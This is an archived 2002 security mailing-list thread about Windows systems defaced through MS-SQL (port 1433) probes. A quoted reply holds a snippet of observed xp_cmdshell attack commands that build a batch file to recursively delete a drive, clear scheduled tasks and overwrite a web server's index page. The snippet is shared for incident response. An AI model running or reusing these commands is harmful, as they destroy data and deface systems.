Security Incidents: RE: Windows Systems Defaced

["Johannes B. Ullrich" <jullrich () sans org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


SQL probe reports to DShield skyrocketed today. It looks like a small
number of sources scanning large IP ranges one after another.

http://www.dshield.org/port_report.php?port=1433 

On Fri, 3 May 2002, Brenna Primrose wrote:

> I saw SQL probes today on several of our systems from wanadoo.fr --
> coincidence?  I think not.  Wanadoo.fr is infamous for looking for FTP
> servers to crack.  Hmmm...
>
>
> AIM - abosolut x psycho
> Yahoo! - absolut_contagion
> ICQ - 1363187
> http://gsa.creighton.edu
> http://profiles.yahoo.com/absolut_contagion
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.12
> GSS d-- s: a-- C++ UL++++ P+ L+ E W++ N+ o-- K- w+ 
> O-- M V-- PS++ PE Y+ PGP- t-- 5-- X++ R- tv+ b+++ DI D+ 
> G e* h- r++ x+ 
> ------END GEEK CODE BLOCK------
>
> -----Original Message-----
> From: Steve Zenone [mailto:zenone () cats ucsc edu] 
> Sent: Thursday, May 02, 2002 10:24 PM
> To: incidents () securityfocus com
> Cc: thompson () isc upenn edu
> Subject: RE: Windows Systems Defaced
>
> Hello,
>
> Stephen W. Thompson wrote:
> |> Have any of you seen similar activity? Any thoughts?
> |
> |Yes, we had one that matches most of your details.  These
> |are exact matches:
> |
> |>  [] Damage occurred around 1600 on 5/1/2002
> |BUT=>   (approx. 16:00 EDT for us)
> |>  [] Win-popup message with "F---ing University of Rochester"
> |>       -- NOTE: not all systems running IIS
> |>  [] Admins claimed that all systems were patched correctly
> |>  [] Most were running updated and current AV
>
> Thank you very much for your reply - it definitely helps!
>
> We have been seeing MS-SQL (1433/tcp) attacks that try and execute 
> the following: 
>
> -----BEGIN SNIPPET-----
>     xp_cmdshell 'echo net send localhost F---ing University of Rochester
>
> rebooting... > rochester.bat'
>
>     xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
>
>     xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
>
>     xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
>
>     xp_cmdshell 'at /delete /y'
>
>     xp_cmdshell 'echo if exist \inetpub\wwwroot\ type 
> %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> 
> rochester.bat'
> -----END SNIPPET-----
>
>
>
>
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
- -- 
- -------
jullrich () sans org                    Join http://www.DShield.org
                          Distributed Intrusion Detection System

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE80tptwWQP+4im9DYRAvS6AKCx/JaYmx1fI6nEn8oHCmqFoPMaBgCfRok0
LayncBWEGwAz57XdPsdeMpA=
=eakE
-----END PGP SIGNATURE-----


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com